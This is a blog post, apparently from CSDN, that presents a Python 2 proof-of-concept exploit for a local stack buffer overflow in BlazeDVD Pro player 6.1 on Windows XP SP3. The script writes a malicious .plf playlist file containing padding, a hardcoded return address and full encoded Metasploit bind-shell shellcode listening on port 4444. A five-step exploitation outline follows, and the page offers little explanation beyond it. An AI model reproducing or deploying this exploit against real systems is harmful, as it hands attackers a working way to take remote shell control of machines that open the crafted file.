exploit - simple stack overflow - BlazeDVD Pro player 6.1

于 2015-06-19 21:25:16 发布
阅读量879 收藏
点赞数
分类专栏: exploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/46565107
版权
本文介绍如何利用BlazeDVD Pro 6.1的本地堆栈溢出漏洞进行攻击。通过详细步骤展示了从程序崩溃到创建shellcode的过程,并提供了针对Windows XP SP3的具体Python脚本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Poc: BlazeDVD Pro player 6.1 Local stack based buffer overflow

PuN1sh3r show us how to exploit BlazeDVD Pro player 6.1 on Windows 2003 server sp1(EN).

Now, I’ll show you poc on Windows xp sp3.

#!/usr/bin/env python2
# -*- coding: utf8 -*-

with open("exploit.plf", "w") as f:
    junk = "A" * 260
    eip = "\x7B\x46\x86\x7C"    # 7C86467B
    # eip = "\xD8\x9E\x24\x77"  # 0x77249ed8

    # badChars: 0x00, 0x0A, 0x1A

    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    # EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    buf = "\x90" * 32
    buf += "\xd9\xc6\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x53\xbf\xe9"
    buf += "\xe6\x11\xd6\x31\x78\x17\x83\xe8\xfc\x03\x91\xf5\xf3"
    buf += "\x23\x9d\x12\x71\xcb\x5d\xe3\x16\x45\xb8\xd2\x16\x31"
    buf += "\xc9\x45\xa7\x31\x9f\x69\x4c\x17\x0b\xf9\x20\xb0\x3c"
    buf += "\x4a\x8e\xe6\x73\x4b\xa3\xdb\x12\xcf\xbe\x0f\xf4\xee"
    buf += "\x70\x42\xf5\x37\x6c\xaf\xa7\xe0\xfa\x02\x57\x84\xb7"
    buf += "\x9e\xdc\xd6\x56\xa7\x01\xae\x59\x86\x94\xa4\x03\x08"
    buf += "\x17\x68\x38\x01\x0f\x6d\x05\xdb\xa4\x45\xf1\xda\x6c"
    buf += "\x94\xfa\x71\x51\x18\x09\x8b\x96\x9f\xf2\xfe\xee\xe3"
    buf += "\x8f\xf8\x35\x99\x4b\x8c\xad\x39\x1f\x36\x09\xbb\xcc"
    buf += "\xa1\xda\xb7\xb9\xa6\x84\xdb\x3c\x6a\xbf\xe0\xb5\x8d"
    buf += "\x6f\x61\x8d\xa9\xab\x29\x55\xd3\xea\x97\x38\xec\xec"
    buf += "\x77\xe4\x48\x67\x95\xf1\xe0\x2a\xf2\x36\xc9\xd4\x02"
    buf += "\x51\x5a\xa7\x30\xfe\xf0\x2f\x79\x77\xdf\xa8\x7e\xa2"
    buf += "\xa7\x26\x81\x4d\xd8\x6f\x46\x19\x88\x07\x6f\x22\x43"
    buf += "\xd7\x90\xf7\xfe\xdf\x37\xa8\x1c\x22\x87\x18\xa1\x8c"
    buf += "\x60\x73\x2e\xf3\x91\x7c\xe4\x9c\x3a\x81\x07\xb3\xe6"
    buf += "\x0c\xe1\xd9\x06\x59\xb9\x75\xe5\xbe\x72\xe2\x16\x95"
    buf += "\x2a\x84\x5f\xff\xed\xab\x5f\xd5\x59\x3b\xd4\x3a\x5e"
    buf += "\x5a\xeb\x16\xf6\x0b\x7c\xec\x97\x7e\x1c\xf1\xbd\xe8"
    buf += "\xbd\x60\x5a\xe8\xc8\x98\xf5\xbf\x9d\x6f\x0c\x55\x30"
    buf += "\xc9\xa6\x4b\xc9\x8f\x81\xcf\x16\x6c\x0f\xce\xdb\xc8"
    buf += "\x2b\xc0\x25\xd0\x77\xb4\xf9\x87\x21\x62\xbc\x71\x80"
    buf += "\xdc\x16\x2d\x4a\x88\xef\x1d\x4d\xce\xef\x4b\x3b\x2e"
    buf += "\x41\x22\x7a\x51\x6e\xa2\x8a\x2a\x92\x52\x74\xe1\x16"
    buf += "\x62\x3f\xab\x3f\xeb\xe6\x3e\x02\x76\x19\x95\x41\x8f"
    buf += "\x9a\x1f\x3a\x74\x82\x6a\x3f\x30\x04\x87\x4d\x29\xe1"
    buf += "\xa7\xe2\x4a\x20"

    nops = "\x90" * (2000 - len(junk) - len(eip) - len(buf))

    payload = junk + eip + buf + nops
    f.write(payload)

How to exploit simple stack overflow ?
1. crash the program
2. find eip
3. filter bad chars
4. create shellcode
5. finish exploit code

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值